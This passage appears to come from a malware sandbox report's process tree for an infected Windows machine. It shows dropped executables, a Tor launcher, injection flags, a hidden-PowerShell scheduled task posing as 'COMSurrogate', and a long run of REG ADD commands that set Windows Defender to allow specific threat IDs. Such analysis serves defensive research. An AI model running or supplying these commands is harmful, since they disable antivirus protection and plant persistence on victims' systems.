                                                                                                                                                2⤵
                                                                                                                                                  PID:5304
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\3A8A.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\3A8A.exe
                                                                                                                                                  2⤵
                                                                                                                                                    PID:3972
                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                  1⤵
                                                                                                                                                    PID:2476
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 872
                                                                                                                                                      2⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:452
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2476 -ip 2476
                                                                                                                                                    1⤵
                                                                                                                                                      PID:2488
                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                      1⤵
                                                                                                                                                        PID:2952
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\4A1B.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\4A1B.exe
                                                                                                                                                        1⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        PID:1260
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4A1B.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\4A1B.exe
                                                                                                                                                          2⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Checks computer location settings
                                                                                                                                                          PID:5340
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\4A1B.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\4A1B.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            PID:3880
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4A1B.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\4A1B.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                              4⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              PID:6076
                                                                                                                                                              • C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe"
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                PID:4980
                                                                                                                                                                • C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:3760
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"
                                                                                                                                                          1⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:6116
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jwzeqsilllyafcnn.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\jwzeqsilllyafcnn.exe"
                                                                                                                                                          1⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:4040
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Get-Variable.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Get-Variable.exe"
                                                                                                                                                            2⤵
                                                                                                                                                              PID:4668
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\signed.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\signed.exe"
                                                                                                                                                                3⤵
                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                PID:3916
                                                                                                                                                                • C:\ProgramData\MsDrvSrvc.exe
                                                                                                                                                                  "C:\ProgramData\MsDrvSrvc.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:1524
                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                /create /tn COMSurrogate /st 00:00 /du 9999:59 /sc once /ri 1 /f /tr "powershell.exe -windowstyle hidden"
                                                                                                                                                                2⤵
                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                PID:1524
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\6DF1.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\6DF1.exe
                                                                                                                                                              1⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                              PID:3204
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe
                                                                                                                                                              1⤵
                                                                                                                                                                PID:804
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 804 -s 484
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  PID:6220
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7BCD.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7BCD.exe
                                                                                                                                                                1⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                PID:3484
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\nijiccssjnaevyew.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\nijiccssjnaevyew.exe"
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:4052
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\8AF1.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\8AF1.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                  PID:3624
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\987E.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\987E.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:4404
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4404 -s 340
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:5288
                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:2448
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 872
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Program crash
                                                                                                                                                                        PID:4332
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 2448 -ip 2448
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:6104
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 4404 -ip 4404
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:5744
                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:3548
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\CE07.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\CE07.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                            PID:4944
                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:4344
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\EF2C.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\EF2C.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:3936
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\EF2C.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\EF2C.exe
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  PID:1088
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\F576.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\F576.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                PID:4904
                                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:109088
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\F7E8.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\F7E8.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:13680
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\FB35.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\FB35.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:24408
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                                                        PID:65352
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 24408 -s 1132
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Program crash
                                                                                                                                                                                        PID:65324
                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:24400
                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:41600
                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:58704
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 24408 -ip 24408
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:65492
                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:64960
                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:65252
                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:73132
                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:72848
                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:85472
                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:99312
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe bH /site_id 525403 /S
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                          PID:109108
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                            PID:1464
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:4660
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  PID:4052
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:5200
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:900
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:544
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:536
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:4416
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:5892
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:5136
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:4324
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:5748
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:4824
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:5604
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:5700
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:4008
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:2464
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:1468
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:2448
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:5608
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:3228
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:2284
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:5288
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:1884
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:3260
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:2028
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
